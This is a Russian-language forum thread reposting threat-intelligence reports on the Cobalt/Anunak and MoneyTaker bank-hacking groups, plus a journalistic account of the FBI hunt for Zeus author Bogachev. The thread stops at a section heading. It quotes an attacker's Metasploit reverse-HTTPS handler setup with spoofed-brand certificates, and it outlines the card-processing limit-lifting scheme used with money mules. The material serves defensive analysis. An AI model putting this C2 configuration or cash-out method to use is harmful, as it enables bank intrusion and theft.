На протяжении всего времени работы Group-IB на международном рынке информационной безопасности мы на блюдаем объединение различных киберкриминальных структур и вербовку отдельных представителей хакерских групп для совершения атак на банки и другие организации. Мы убеждены в том, что эта тенденция в ближайшие годы усилится. В данном отчете мы впервые публично заявляем о совместных операциях групп Cobalt и Anunak (Carbanak), а также приводим ретроспективу наиболее значимых атак с 2016 по 2017 год.

24310569_m.png

24310570_m.png


В более раннем исследовании 2016 года мы связали появление Cobalt с прекращением существования другой группы – Buhtrap. Между последней атакой Buhtrap и первой атакой Cobalt в России прошло три месяца. Именно в этот период группа Cobalt подготовила свою инфраструктуру и совершила хищения через SWIFT в банках Гонконга и Украины. О том, что к атакам на SWIFT причастны именно Cobalt, говорит уникальный загрузчик (stager), который использовали только они. Однако для Cobalt образца 2016 года эти атаки были неожиданно сложными технически. Кроме того, сам процесс обналичивания денег, выведенных через SWIFT, всегда являлся нетривиальной задачей.
Эти факты указывали на вероятное наличие сообщников. Связь с группой Anunak удалось найти только спустя 1.5 года (в 2017 году), когда в одном из сложных инцидентов в ходе мероприятий по реагированию нами был обнаружен уникальный SSH-бэкдор, который использовался группой Anunak в 2014-м году.

Собственная безопасность
Первым большим самостоятельным успехом Cobalt стал First Bank на Тайване. В ходе атаки на банкоматы хакерам удалось похитить 2,18 млн долларов. После этого преступники стали действовать осторожнее, переключившись на более безопасные атаки, связанные с карточным процессингом. Параллельно группа начинает дорабатывать свои инструменты, в частности, эксплойты и stager’ы для того, чтобы усложнить их атрибуцию и обнаружение.

В сентябре 2016 они сумели получить доступ в один из банков Казахстана. Процесс подготовки атаки и изучения инфраструктуры банка занял 2 месяца. В ноябре они успешно похитили около 600 тысяч долларов через карточный процессинг, после чего поставили такие атаки на поток. С этого месяца именно процессинг стал основной целью Cobalt в банках разных стран. Это позволяло хакерам работать быстрее и безопаснее: после задержаний мулов (лиц, привлекаемых для обналичивания) в Тайване, Румынии, России безопасность стала для них приоритетом.

Технологическая гонка
2017-й стал годом технологического прорыва группы. Вероятнее всего, Cobalt нашли команду разработчиков, которые на постоянной основе выполняли их заказы, создавая новые инструменты и дорабатывая эксплойты в целях затруднения обнаружения средствами защиты. Новый ресурс позволил им быть оперативнее: при появлении PoC для 1-day эксплойтов группа Cobalt в течение нескольких часов начинала использовать ее модифицированную версию.

Модернизация технологий и усовершенствование тактики позволили Cobalt еще успешнее атаковать свои цели внутри банков – SWIFT, карточный процессинг, платежные шлюзы. В этом же году Cobalt устанавливает персональный «рекорд», сделав попытку вывести максимальную для них сумму 25 млн. евро из одного европейского банка.

Среди новых и модернизированных программ в 2017, используемых Cobalt:
Petya. Известный во всем мире вирус-шифровальщик был использован Cobalt в ходе взлома российского банка. Хакеры попытались похитить деньги через карточный процессинг, но после неудачной попытки воспользовались модифицированной версией шифровальщика Petya
– «PetrWrap», которую они же и разработали. Низкоуровневая модификация была исполнена на С, что свидетельствует о высоком уровне технической подготовки автора. В результате они вывели из строя сеть этого небольшого банка, что значительно затруднило реагирование.
JS-бэкдор. В мае они начали тестирование нового инструмента — библиотеки формата PE (DLL), выполнявшей роль разведывательного модуля. Однако этот инструмент так и не был использован группой, и они перешли к тестированию нового JS-бэкдора, который должен был выполнять роль развед-модуля и усложнять процесс их обнаружения и исследования. Данный бэкдор впервые был использован в атаках через компрометацию серверов американского интегратора с высоким качеством составления фишинговых писем и приложением реальных отчетов из системы SWIFT. Программа использовалась в атаках не только по странам СНГ и восточной Европы, но и для атак англоговорящих компаний.
InfoStealer. В сентябре Cobalt реализовала функциональность JS бэкдора в исполняемом файле, но без возможности загрузки и запуска других программ. В этом InfoStealer была указана версия 0.2. Он полностью memory-hosted и не оставляет следов в файловой системе. Данная программа использовалась в атаках на СМИ, разработчиков ПО, страховые компании с целью использования их инфраструктуры для дальнейших атак на банки
Recon Backdoor (CobInt). В декабре они начали использовать новый Java-загрузчик, генерируемый фреймворком CobaltStrike, но с уникальным payload’ом, который догружает Recon бэкдор Coblnt. Бэкдор в виде команд от сервера получает модули на исполнение. Подобное усложнение вектора атаки очень похоже на тактику используемую в целенаправленных атаках профессиональными прогосударственными атакующими. Похожим образом в свое время работал Lurk.

Атака через посредника

Важным изменением тактических действий Cobalt стало смещение в сторону непрямых
атак. В феврале 2017 года эксперты Group-IB фиксируют успешный взлом системного интегратора, которого Сobalt использует как «посредника» для проведения атак на компании в России, Казахстане, Молдавии, а также их представительства в других странах. В течение последующих 9 месяцев они получат доступ минимум в 4 аналогичных компании: по одной в Украине и США, и двум компаниям в России.
Нетипичные объекты для атак
В марте 2017-го они начали готовить атаки на компании, предоставляющие электронные кошельки и терминалы оплаты. Уже в апреле они изучили новую схему и создали уникальную программы для автоматического формирования мошеннических платежей через платежные шлюзы. В сентябре они проводят первую атаку на компанию разработчика электронных кошельков и похищают деньги через платежный шлюз. Именно в этом инциденте впервые обнаружены явные следы группы Anunak. Позже группа начинает атаковать еще более нетипичные цели – страховые агентства и СМИ. Они захватывают контроль над почтовыми серверами или учетными записями жертв для последующего использования их инфраструктуры в атаках на финансовые организации.

Cobalt: перезагрузка
В 2018-й год Cobalt вошла на пике формы – как с точки зрения технологического, так и ресурсного обеспечения. И здесь случилось непредвиденное: 26 марта 2018 года в СМИ появилась информация о том, что в Испании был задержан лидер Cobalt. Скорее всего, он был арестован раньше, это не остановило других участников этой группы. Они продолжили атаковать финансовые учреждения, хотя и снизили свою активность в России и СНГ, временно сосредоточившись на других регионах. Примечательно, что зафиксированные в марте фишинговые рассылки всегда приходили от имени американских компаний, например, IBM, Verifon, Spamhaus.

7-10 марта письма рассылались с доменов ibm-cert.com, ibm-warning.com, ibm-notice.com.
15 марта была зафиксирована новая рассылка — в качестве сервера управления использовался домен dns-verifon.com, эксплуатировавший бренд компании VeriFon – круп-
нейшего вендора POS-терминалов.
26 марта письма рассылали от имени компании Spamhaus, некоммерческой организации, специализирующейся на борьбе со спамом. Для этой рассылки атакующие зарегистрировали очень похожий домен spamhuas.com.
3 апреля были зафиксированы рассылки со скомпрометированной почтового сервера шведской компании.

Эксперты Group-IB зафиксировали новую целевую атаку Cobalt, направленную на банки
России, СНГ и предположительно на иностранные организации. Впервые фишинговые письма направляются от имени крупного антивирусного вендора. Учитывая технологическое развитие группы, а также тот факт, что после ареста главаря, на свободе до сих пор остаются другие ее участники, мы не исключаем, что члены Cobalt в ближайшее время вольются в другие группы или будут возрождены в виде условного Cobalt 2.0. В любом случае, их рано списывать со счетов.

Атаки на карточный процессинг
В сентябре 2016 года группа Cobalt получила доступ в один из банков Казахстана и начала подготовку к новому для них типу хищений – через карточный процессинг. Процесс изучения занял 2 месяца, и в ноябре они успешно похитили около $600 тыс. Уже в 2017 году, используя этот метод хищения, хакеры Cobalt установили абсолютный «рекорд» и предприняли попытку похитить 25 млн евро.
Cobalt выучили важный урок: в атаках с получением доступа к банкоматам, хищение проходило в той же стране, где находился атакованный банк, это приводило к тому, что мулов, занимающихся снятием наличных, часто задерживали. Их безопасность стала для Cobalt важным приоритетом после их задержаний в Тайване, Румынии и России. Атаки через карточный процессинг существенно снижали риск повторных арестов, за счет следующих факторов:
• Нет необходимости в сложной схеме отмывания денег: атакующие сразу снимали чистый кэш.
• Для того чтобы обеспечить обналичивание, достаточно оформить или купить несколько карт.
• Совершая атаку в одной стране и снимая деньги в другой, хакеры выигрывали время, поскольку служба безопасности банка не могла оперативно связаться с полицией и получить записи с камер видеонаблюдения.

Новая значительно менее рискованная и эффективная схема Cobalt была очень проста:
• После получения контроля над банковской сетью атакующие проверяли, есть ли возможность подключаться к системе управления карточным процессингом.
• Легально открывали или покупали доступные на рынке карты банка, в который они получили доступ. Обычно для хищения использовалось около 30 карт.
• Мулы с предварительно открытыми картами уезжали в другую страну, где ждали начала операции.
• Атакующие, используя доступ к карточному процессингу, убирали или увеличивали лимиты на снятие наличных для карт мулов.
• Убирали овердрафт лимиты, что позволяло уходить в минус даже по дебетовым картам.
• Мулы, используя эти карты, снимали наличные в одном банкомате, потом переходили к другому и так далее.

Пошаговая хронология атаки на карточный процессинг

1. Заражение:
• 07.09.2016 осуществляется массовая рассылка фишинговых писем с вредоносным вложением для загрузки CobaltStrike на множество электронных почтовых адресов, среди которых – адреса работников банка.
• 08.09.2016 в 08:38:45 на рабочей станции сотрудника банка закрепляется вредоносное ПО, и начинается фаза распространения CobaltStrike по банковской IT-инфраструктуре.
• 09.09.2016 с различных рабочих станций осуществляется загрузка CobaltStrike, после чего злоумышленники получают скрытый канал связи для мониторинга IT-инфраструктуры банка и перехвата управления над любыми её активными узлами.
• С 09.09.2016 по 10.11.2016 посредством инструментария Cobalt Strike злоумышленники собирают данные о доменных и локальных учётных записях пользователей.

2. Разведка:
• С 10.11.2016 по 30.11.2016 посредством CobaltStrike и скомпрометированных учетных записей пользователей злоумышленники исследуют и изучают систему карточного процессинга.
• Осуществляются многократные попытки подключения к системе с целью разработки нескольких альтернативных маршрутов доступа к управляющему модулю.
• Исследуются возможности системы с целью определения специфических настроек карточных счетов, установки кредитных лимитов, изменения ограничений по обналичиванию средств.

3. Подготовка дропов:

• C 04.11.2016 по 12.12.2016 злоумышленники легитимным способом получают мультивалютные карты в четырех различных филиалах банка Казахстана.
• Большая часть выпущенных карт вывозится из Казахстана в Российскую Федерацию, Латвию, Эстонию, Францию, Австрию, Германию, Нидерланды и Бельгию.

4. Хищение:
• 18.12.2016 реализуется типовая дроп-схема. Злоумышленники, у которых имелся несанкционированный доступ к IT-инфраструктуре банка, используя скомпрометированные учётные записи, подключаются к платежной системе, устанавливают кредитные лимиты
на карты дропов и снимают лимиты на обналичивание денежных средств для данных карт.
• 18.12.2016 – 19.12.2016 заранее подготовленная группа дропов по команде дроповодов осуществляет обналичивание денежных средств по установленным кредитным лимитам.
• 19.12.2016 работники банка обнаруживают нелегитимную установку кредитных лимитов и в 11:30 все карты и карточные счета.
• 20.12.2016 фиксируется последняя попытка дропов снять денежные средства.
 
Тема конечно очень старая и многим известная. Но не смог обойти её стороной.
! Статья журналистская, а не технический отчет специалистов. Так что сколько в ней правды, а сколько авторских домыслов неизвестно.


Охота за российским хакером

Как создатель вируса Zeus Евгений Богачёв из России крал миллионы долларов и долгие годы скрывался от агентов ФБР.

JFMRHF8l.png


30 декабря 2016 года президент США Барак Обама ввёл санкции против ФСБ, ГРУ, нескольких технологичных компаний и двух хакеров, среди которых был и Евгений Богачёв. Сейчас мужчина скрывается, и о его деятельности ничего не известно, но ещё несколько лет назад ФБР и лучшие IT-специалисты по кибербезопасности разыскивали этого человека по всему миру.
Богачёва считают создателем знаменитого вируса ZeuS, поработившего сотни тысяч компьютеров по всему миру, и основателем элитной хакерской группировки, укравшей более 100 миллионов долларов с банковских счетов. За его голову правительством США назначена награда в 3 миллиона долларов. Историю деятельности Богачёва и борьбу со спецслужбами рассказал журналист издания Wired Гаретт Графф (Garrett M. Graff).

Становление «Зевса»
Весной 2009 года специальный агент ФБР Джеймс Крейг (James Craig) приехал в бюро в Омахе, штате Небраска. Он был бывшим морпехом и зарекомендовал себя как хороший IT-специалист, поэтому его назначили следователем по делу о крупной краже средств через интернет. В мае 2009 года у дочерней организации американской компании First Data украли 450 тысяч долларов. Чуть позже у клиентов первого национального банка Омахи украли 100 тысяч долларов.
Крейга смутило, что в обоих случаях кражи провели с IP-адресов самих жертв при помощи их логинов и паролей. После проверки компьютеров агент ФБР обнаружил, что оба устройства заражены одним вирусом — трояном «Зевс».
С помощью специалистов по кибербезопасности Крейг выяснил, что этот вирус впервые появился в 2006 году. Однако существуют версии, что впервые ботнет разошелся в 2007 году. Так или иначе, Zeus приобрёл огромную популярность у хакеров, а эксперты по безопасности описывали «Зевса» как удобный, эффективный и универсальный технологический шедевр. Крейг попытался найти автора вируса, однако узнал лишь никнеймы хакера: Slavik и lucky12345
Продолжив расследование, Крейг изучил принцип работы «Зевса». Он заражал компьютер через поддельные электронные письма и фальшивые интернет-уведомления, которые при нажатии обманом загружали в систему заражённый файл. Как только «Зевс» попадал в компьютер, он крал логины, пароли и PIN-коды пользователя на сайтах, используя кейлоггер, то есть записывая нажатия клавиш. Вирус мог даже менять формы входа в систему, получая доступ к ответам на тайные вопросы вроде девичьей фамилии матери или номера страхования. После этого компьютер мог незаметно для пользователя рассылать спам, распространяя вирус дальше.
До начала расследования Крейга Slavik часто появлялся на хакерских форумах и продвигал свой вирус. Однако в 2010 году он объявил об «уходе» и напоследок показал расширенную версию «Зевса» с возможностью привязать программу к своему владельцу. За копию программы Slavik просил 10 тысяч долларов. Такие затраты могли себе позволить не все хакеры, но и автор «Зевса» больше не хотел мыслить мелко — у него были большие планы.
Ещё летом 2009 года вместе с доверенными хакерами Slavik создал группировку элитных киберпреступников. Для оперативного общения он разработал модернизированную версию «Зевса» со встроенным мессенджером Jabber Zeus. Благодаря этому команда могла скрытно и оперативно общаться и координировать взломы банковских счетов. Новая тактика Slavikа предполагала, что главный упор будет сделан на кражу личных данных у бухгалтеров и менеджеров крупных компаний, имеющих доступ к финансовым системам.
Параллельно с этим Крейг проводил расследование, но, как он позже признался журналисту Wired, даже не подозревал о масштабах угрозы. И только когда десятки американских банков начали жаловаться на электронные кражи годичной выручки агент ФБР понял, что столкнулся с профессиональной хакерской группировкой.

Расследование спецслужб
В сентябре 2009 года Крейг вместе с несколькими IT-специалистами обнаружил в Нью-Йорке сервер, связанный с системой Jabber Zeus. Агент ФБР добился ордера на обыск и перезаписал трафик сервера на жёсткий диск. Когда инженер федеральной службы увидел содержимое данных, он на несколько минут потерял дар речи. Оказалось, что Крейг заполучил хакерскую переписку по мессенджеру Jabber с адресами из России и Украины.
Следующие несколько месяцев инженер американской компании по кибербезопасности Mandiant и сотрудники ФБР расшифровывали переписку. Процесс затруднился из-за хакерского сленга, который пришлось анализировать американским лингвистам.
В расшифрованных данных хакеры обсуждали взломанные компании, и благодаря этому Крейг обзвонил руководство организаций. Он сообщил, что их деньги пропали из-за опасного компьютерного вируса. К этому моменту бухгалтеров нескольких фирм уже уволили по подозрению в кражах.
Однако успешная расшифровка данных слабо продвинула дальнейшее расследование. Только под конец 2009 года Крейг выяснил, как хакерская группировка умудряется скрытно переводить огромные суммы денег.
Всё началось с рассказа трёх уроженок Казахстана сотрудникам ФБР. Они якобы приехали в Нью-Йорк в поисках работы, и однажды неизвестный предложил им поучаствовать в странной схеме. Их привозили на машине к банку, после чего женщины открывали там счёт и сообщали сотрудникам, что приехали в страну на лето по учёбе.
Несколько дней спустя мужчина привозил женщин, и они снимали деньги, поступившие на счёт. За эту работу им платили небольшой процент, а остальное передавали рекрутеру. Когда об этой истории узнал Крейг, он понял — женщин использовали как «денежных мулов». Их работа заключается в передаче денег хакерской группировке Slavik. Вскоре ФБР выяснили, что схема «мулов» работала в США, Румынии, Чехии, Великобритании, Украине и России.
Когда спецслужбы США попросили банки сообщать о людях, которые напоминают таких «мулов», агентам ФБР вскоре пришлось общаться с десятками людей. В основном это были студенты и иммигранты, снимающие со счетов по девять тысяч долларов, чтобы не привлекать внимания.
Летом 2010 года сотрудники службы арестовали двух уроженцев Молдавии, предлагающих работу «мулом». Параллельно с этим ФБР совместно с Минюстом определил, что трое лидеров хакерской группировки Slavik скрываются на Украине в Донецке.
Осенью 2010 года ФБР договорилось с украинской службой безопасности (СБУ) о совместном рейде к одному из лидеров хакеров Ивану Клепикову. Когда спецагенты пришли в квартиру в старом советском доме и начали обыск, хакер спокойно наблюдал за процессом. На кухне его жена держала на руках ребёнка и смеялась вместе с агентами СБУ. Крейг забрал больше 20 терабайтов информации с десятков жёстких дисков Клепикова и вернулся в США.
Параллельно с этим агенты арестовали 39 рекрутеров «мулов» в четырёх странах. Этого хватило, чтобы нарушить хакерскую систему отмывания денег. Однако Крейг разочаровался — ФБР нисколько не приблизились к поимке руководителя группировки Slavik. Спецслужбы знали наверняка только одно: у него есть жена. После рейда спецслужб на Украине лидер хакеров и автор Jabber Zeus исчез, и Крейга перевели на другое расследование.

Новый вирус и провальная атака
В 2011 году небольшое сообщество по кибербезопаности заметило новую разновидность «Зевса» с модернизированной системой бот-нета. В первоначальных версиях вируса заражённые компьютеры управлялись через один командный центр, что делало всю систему уязвимой. Ведь если спецслужбы обнаружат этот сервис, они смогут одним ударом отключить всю систему.
В новой версии «Зевса», ставшей известной как GameOver Zeus, заражённые компьютеры постоянно хранили и обновляли список других инфицированных. Это делалось на тот случай, если вирус на устройстве зафиксирует попытку перехватить его связь с командным центром. В такой момент заражённый компьютер мог переключиться на другой командный сервис и сбить с толку спецслужбы.
В ФБР предполагали, что GameOver Zeus использовала новая группировка хакеров «Бизнес-клуб», которую Slavik основал вместо рассеянной Jabber Zeus. Сначала GameOver крал банковские данные с помощью заражённого компьютера, затем выкачивал деньги и переводил на подконтрольные хакерам счета. Параллельно с этим вирус на компьютерах блокировал доступ к банковскому сервису, чтобы не дать людям проверить свои банковские счета до тех пор, пока деньги окончательно не перейдут злоумышленникам.
Новая система работала отлично. В ноябре 2012 года «Бизнес-клуб» украл почти 7 миллионов долларов у американской компании. В ФБР больше не могли захватить рекрутеров и прервать процесс поступления денег. Все «мулы» работали в городах дальневосточного Китая недалеко от Владивостока.
Но успех со взломами банковских счетов с помощью нового вируса оказался лишь началом новой стратегии Slavik. В октябре 2013 года группировка распространила в интернете вирус CryptoLocker, шифрующий файлы на инфицированных компьютерах.
3M14zkIl.png

В среднем за разблокировку хакеры требовали от 300 до 500 долларов. Деньги они принимали только в биткоинах, чтобы их не отследили спецслужбы. С помощью CryptoLocker хакеры смогли монетизировать тысячи компьютеров, которые попали под действия вируса, но не содержали полезной информации. Эта идея не была новой, но именно шифровальщик «Бизнес-клуба» развил её до международных масштабов.
С 2011 по 2013 года специалисты по кибербезопасности три раза пробовали подорвать работу серверов «Бизнес-клуба» и вируса GameOverZeus. Однако каждый раз хакерская группировка легко отбивала атаки. Единственным результатом таких действий стало то, что Slavik укрепил защиту на случай новых нападений.
Это, вероятно, и стало причиной провала следующей атаки. Её спланировала небольшая команда профессиональных IT-специалистов, борющихся с вирусами. Одним из экспертов группы был уроженец Германии Тильманн Вернер (Tillmann Werner) — работник компании CrowdStrike.
В феврале 2012 года IT-специалист полностью прервал работу вируса Kelihos, выросшего на рассылках спама с виагрой. Для Вернера это была большая победа, но он знал — Kelihos и близко не стоял с GameOver Zeus. Специалист видел, как легко Slavik отбил атаки на свои серверы, и учёл этот опыт.
Почти год Вернер и команда европейских специалистов работала над планом по «штурму» серверов GameOver Zeus. Идея заключалась в том, чтобы централизовать весь трафик вируса, исходящий из заражённых компьютеров, а затем направить его на сервер, контролируемый группой Вернера. Таким образом они надеялись отследить источник заражения — компьютер Slavik.
В январе 2013 года IT-специалисты атаковали серверы и быстро собрали в кучу 99% трафика инфицированных вирусом компьютеров. Однако оставшийся процент контролировал командный центр хакера, и все заражённые компьютеры были связаны с этим сервером. Через две недели Slavik снова контролировал инфицированные компьютеры. План, который европейские специалисты готовили девять месяцев, провалился.

Финальное столкновение
За последние десять лет отдел ФБР в Питтсбурге приобрёл статус самого мощного государственного аппарата по борьбе с киберпреступностью. Главную роль в этом сыграл агент Кит Муларски (Keith Mularsky). Он устроился в ФБР в 1998 году, и следующие семь лет расследовал дела по шпионажу и терроризму. Муларски не разбирался в компьютерах, однако в 2005 году перешёл в молодой отдел по киберзащите в Питтсбурге.
ledFBQ8l.png


Следующие два года Муларски работал под прикрытием, втираясь в доверие к руководству киберпреступной группировки DarkMarket. Хакерская организация прославилась кражами и продажей личных данных и номеров кредитных карт, и долгие годы оставалась неуловимой для ФБР.
Благодаря Муларски, ставшим администратором DarkMarket, в 2008 году спецслужбы арестовали по связям с группировкой 60 человек. После этого незаконный сайт закрылся, а отдел по борьбе с интернет-преступностью получил крупное госфинансирование. Поэтому когда операция европейских IT-специалистов по борьбе со Slavik провалилась, они попросили помощи у Муларски.
Обычно ФБР отказывается сотрудничать с другими организациями, однако агентству нужна была помощь. Поэтому ведущий расследование Slavik Муларски пригласил в команду европейских IT-специалистов, которые некогда штурмовали серверы «Зевса». Они знали принципы работы системы и, как решил Муларски, смогут помочь.
Объединённая команда по кибербезопасности составила вдумчивый план победы над Slavik и его вирусом. Для начала сотрудники ФБР должны были выяснить настоящее имя хакера, чтобы составить против него судебное дело. Затем европейские программисты вновь атаковали бы заражённые компьютеры и попробовали централизовать их трафик. Если бы это удалось, следователи получили ордеры на изъятие серверов. После этого специалисты планировали выпустить обновление, которое «вылечит» инфицированные компьютеры.
В начале 2014 года, через месяц после запуска расследования, команда вышла на след Slavik. Она отследила электронный адрес, на который был зарегистрирован аккаунт хакера на сайте «Бизнес-клуба». При тщательном изучении выяснилось, что следы электронной почты всегда связаны с одним именем в российских социальных сетях — Евгений Богачёв.
Следователи поняли, что 30-летний житель России из Анапы и есть тот хакер, который годами всу*** обыгрывал международные спецслужбы и лучших киберспециалистов. На фотографиях Богачёв был с женой и дочерью, а позже программисты выяснили, что первую версию «Зевса» Богачёв написал ещё в 22 года.
Однако не определение настоящего имени Slavik стало открытием. Через его почту спецслужбы отследили регулярный трафик по заражённым компьютерам. С их помощью Богачёв искал секретные данные грузинских, турецких и украинских спецслужб, а также собирал информацию об участии России в сирийской войне.
После раскрытия этой информации специалисты решили, что программист шпионит для российского правительства. Эта теория стала ещё реальней, когда в марте 2014 года Крым вошёл в состав РФ. После этого частота запросов об украинских секретных данных с инфицированных компьютеров увеличилась.
WEziuEml.png


На основе найденной информации команда IT-специалистов и ФБР построили теорию, что после анонса своего «ухода» в 2010 году Богачёв сформировал секретную хакерскую группировку. В какой-то момент на него вышли российские спецслужбы и предложили сделку: шпионить для Кремля в обмен на разрешение продолжить электронные кражи.
Собрав эту теорию воедино, ФБР запросила у судов ордеры для захвата серверов GameOver и «Бизнес-клуб». К этому времени европейские специалисты знали систему «Зевса» не хуже, чем Богачёв. Они выяснили, что главные командные центры вируса расположены в Канаде и на Украине, и власти этих стран согласились временно отключить их на время операции.
30 мая 2014 года, спустя больше года с начала расследования, спецслужбы Канады, США, Великобритании, Италии, Японии и других стран подготовились к штурму серверов Богачёва. Как только команда получила разрешение, канадские и украинские спецслужбы отключили командные серверы вируса внутри стран, а затем специалисты начали перекачивать трафик заражённых компьютеров на свои серверы. Параллельно программисты блокировали доступ хакерской группировки к сайту «Бизнес-клуба», чтобы помешать скоординировать оборону.
За несколько часов усиленной работы инженеры команды едва смогли перехватить сто инфицированных компьютеров — недостаточный урон для вируса, захватившего полмиллиона устройств. Однако с каждым следующим часом специалисты захватывали всё больше заражённых компьютеров.
В это же время инженеры зафиксировали активность с IP-адреса Богачёва, пытающегося стабилизировать ситуацию. Он видел, что атаку координировали профессионалы, и не собирался сдаваться. Команда предугадала действия хакера и отключила турецкий прокси-сервер, с которого он работал. К этому моменту борьба продолжалась уже больше десяти часов, и собравшиеся сотрудники ФБР вместе с программистами нервно наблюдали за технологичным столкновением.
Через 60 часов после начала операции специалисты объявили о победе. Командные центры Богачёва не работали, а основная часть заражённых компьютеров контролировалась через серверы спецслужб. Следующие несколько недель Богачёв пробовал вернуть контроль над трафиком, но спецслужбы отбили атаки. Через год после поражения российского хакера в США почти полностью прекратились тайные перехваты аккаунтов по принципу «Зевса».
В 2015 году власти США объявили награду в 3 миллиона долларов за информацию, которая поможет задержать Богачёва. Это самая большая премия за поимку киберпреступника в американской истории.
По данным правительственных источников издания Wired, власти США не считают, что Богачёв по заказу российской стороны участвовал во взломе данных, связанных с выборами в США. Источник заявил, что администрация Барака Обамы включила Богачёва в санкционный список для давления на российское правительство: якобы Кремль может передать хакера американским властям в качестве жеста примирения.
По данным спецслужб США, за всё время работы «Зевса» его автор украл как минимум 100 миллионов долларов. Команда ФБР из Питтсбурга продолжает розыск хакера и получает наводки о возможном местонахождении Богачёва. Однако пока неизвестно, что планирует делать сам российский хакер.
 
MoneyTaker

Лично моё мнение, MoneyTaker самая сильная из когда-либо существовавших групп, среди тех, кто работал по коммерции.

MoneyTaker (Часть 1.)
Полтора года ниже радаров


В период с мая 2016 по ноябрь 2017 были атакованы десятки банков и юридических организаций, расположенных в США, Великобритании и России. Один из американских банков был ограблен дважды. Помимо денежных средств, злоумышленники похитили документацию о системах межбанковских платежей, необходимую для подготовки дальнейших атак.
Проведя анализ этих инцидентов, использованных инструментов и тактики злоумышленников, мы пришли к выводу, что за этими атаками стоит одна и та же группа, которую мы назвали MoneyTaker. Несмотря на высокую результативность атак, о них до сих пор ничего не писали в прессе.

Цели группы MoneyTaker

• Всего нам известно об атаках на 20 компаний. 16 из них находятся в США. В большинстве случаев это были небольшие комьюнити банки, в которых злоумышленники атаковали системы карточного процессинга. Средний ущерб от одной атаки составляет 500 тысяч долларов США.
• Преступники похитили документацию к системе FedLink компании OceanSystems: этой платформой пользуются 200 банков в Латинской Америке и США. Вероятно, эти банки являются следующей целью группы MoneyTaker.
• В России их основной целью является система межбанковских переводов АРМ КБР. Средний размер хищения при такой схеме — 72 млн. рублей, однако часть денег пострадавшим банкам удалось вернуть.
Инструменты и тактика
Злоумышленники используют как заимствованные, так и собственные инструменты. При атаках они изобретательны и осторожны: используют “одноразовую” инфраструктуру и
тщательно уничтожают следы своего присутствия.
Проникновение
• Для проникновения в корпоративную сеть группа использует легитимный фреймворк Metasploit и PowerShell Empire.
• После успешного проникновения хакеры тщательно уничтожают следы того, как именно они получили доступ в сеть. Однако в одном из инцидентов в России нам удалось найти начальную точку проникновения. Доступ в корпоративную сеть банка хакеры получили, атаковав личный (домашний) компьютер администратора этой финансовой организации.
Скрытность
• Группа использует «бестелесные» программы, которые работают только в оперативной памяти и уничтожаются после перезагрузки.
• Чтобы соединения с сервером управления не вызвая подозрений у службы безопасности, злоумышленники использовали SSL-сертификаты с именами известных брендов в названии: Bank of America, Federal Reserve Bank, Microsoft, Yahoo и др.
• Серверы для начального заражения являются одноразовыми и меняются сразу после успешного заражения.
Программы для атак
В группе работают специалисты, достаточно квалифицированные, чтобы оперативно модифицировать используемые ими инструменты. В некоторых случаях они вносили изменения в код программы «на лету» — прямо во время проведения атаки.
24483317_m.png

Сокрытие следов
• Сервер, использованный при атаке, сконфигурирован таким образом, чтобы отдавать вредоносную “полезную нагрузку” только по установленному списку IP-адресов, принадлежащих атакованной компании. Так преступники предотвращают попадание «полезной нагрузки» к внешним аналитикам и экспертам.
• После каждой группы атак злоумышленники разворачивают новую инфраструктуру.
• Использовали программу, которая должна была надежно удалить все компоненты использованных им программ. Однако допустили ошибку в коде, из-за чего данные на атакованном компьютере не удалились, и forensic-эксперты узнали больше о том, что это за группа и как она работает.
Взаимосвязь между инцидентами
Всего за полтора года нами зафиксировано 20 инцидентов. Поначалу мы разделили эти инциденты на три группы и рассматривали их по-отдельности. Но в ходе глубокого исследования использованной злоумышленниками инфраструктуры, инструментов, тактики, результаты которого представлены в этом отчете, мы сделали вывод, что за всеми инцидентами стоит одна и та же группа – MoneyTaker.
24483318_m.png

Общие признаки между группами 1, 2 и 3
• Metasploit для проникновения в корпоративную сеть
• SSL сертификаты для защиты трафика между Meterpreter и С2, использующие известные бренды
• Русскоговорящие атакующие
• Есть свои разработчики, которые создают уникальные инструменты
• Компиляция вредоносного кода прямо в момент атаки
• Зачистка следов происходит таким образом, чтобы скрыть начальный вектор проникновения
Атакующие настраивали перенаправление корпоративной почты на бесплатные почтовые сервисы Yandex.ru и Mail.ru.
Общие признаки между группами 2 и 3
• Первоначальной целью в России была система АРМ КБР
• Использование доменов в зоне .ga
• Похожее перемещение в сети.
• Общий хостинг в инцидентах 2016 и 2017
Общие признаки между группами 1 и 2
В обоих группах используется версия UltraVNC 1.1.9.4, которая была доступна еще в 2013 году. Актуальная версия во время атак в России и США была 1.2.0.6.
24483319_m.png

Хронология атак
• Самая первая атака, с которой мы связываем эту группу, была проведена весной 2016 года, когда из банка США были похищены деньги в результате получения доступа к системе карточного процессинга STAR, компании FirstData.
• В сентябре 2016 года мы зафиксировали несколько атак на банки в России, основной целью была российская система межбанковских переводов АРМ КБР. После успешного хищения в одном из банков, атаки прекратились, как и в случае хищений в США.
• В ноябре 2016 злоумышленники развернули новую инфраструктуру, с которой начинают опять атаковать банки в США. Последнюю активность в этой группе атак мы зафиксировали в июне.
• В ноябре 2017 зафиксирована новая успешная атака этой группы в России и как и в 2016 году, они похитили деньги через систему межбанковских переводов.

ИНФРАСТРУКТУРА ДЛЯ АТАКИ

Для проведения целенаправленных атак атакующие используют распределенную инфраструктуру, которую достаточно сложно отслеживать. Достаточно уникальной особенностью является наличие Persistence сервера, который отдает полезную нагрузку
только для реальных жертв, чьи IP-адреса добавлены в белый список.
24483320_m.png

Pentest framework server
Это уже сервер, с которого осуществляется основная работа. На него они устанавливают легитимные инструменты для проведения тестов на проникновение Metasploit и с него управляют всей атакой.
Когда полезная нагрузка (Meterpreter) запускается на скомпрометированном хосте, она инициирует исходящие соединение по SSL Это позволяет избегать обнаружения системами сетевой безопасности. Ниже представлен код, исполненный в панели Metasploit злоумышленником:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse _ https
set LHOST _ c2serverIP _
set LPORT 443
set HandlerSSLCert /root/.msf4/loot/20161031010327 _
default _ 46.228.47.114 _ www.yahoo.com _ pe _ 399345.pem
set StagerVerifySSLCert true
set EnableStageEncoding true
set StageEncoder x86/shikata _ ga _ nai
set ExitOnSession false
По умолчанию Metasploit генерирует самоподписанные SSL сертификаты и указывает случайные значения в поля: Valid from, Valid till, Common name. И такие сертификаты тоже могут вызывать подозрения.
Группа MoneyTaker перед проведением атаки также генерирует самоподписанные SSL-сертификаты, но поля заполняет не случайным образом, а указывает названия узнаваемых брендов, чтобы снизить вероятность обнаружения.
Мы обнаружили использование следующих сертификатов:
24483321_m.png

Persistence server
